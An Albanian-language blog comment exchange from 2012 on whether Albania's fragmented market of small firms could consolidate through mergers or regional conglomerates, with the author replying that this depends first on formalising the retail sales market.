    Te faleminderit per pergjigjen e perpikte. Ne fakt, nje pike qe nuk e kisha menduar me pare me bene gjithnje e me teper logjike tashme. Ke shume te drejte qe pamundesia per te arritur nivele te uleta te kostos mesatare te prodhimit, kuptohet edhe ne rastin kur kurba eshte parabole e permbysur,pengon pervetesimin e teknologjive te tjera. Meqenese kuptoj qe sektorin privat e njeh teper mire, a mendon se evolimi i struktures se fragmentuar e tregut shqiptar (pra shume firma relativisht te vogla qe konkurrojne njera tjetren) ne treg me perqendrim me te vogel firmash te medha si rezultat i bashkimit te disa kompanive me profil te njejte eshte i mundur ne periudhen afat-shkurter ose afat-mesme?! Po mundesia e konglomerateve rajonal?!

  • May 25, 2012 at 1:49 pm
    Permalink

    🙂 Mendoj qe eshte i mundur ( dhe ne ate rast me ritme relativisht te shpejta) vetem pasi te arrihet formalizimi i tregut te shitjeve me pakice. Kjo ne fakt eshte teme per nje artikull te ardhshem qe mendoj te shkruaj ne lidhje me kete ceshtje kaq sensitive per ekonomine shqiptare

Leave a Reply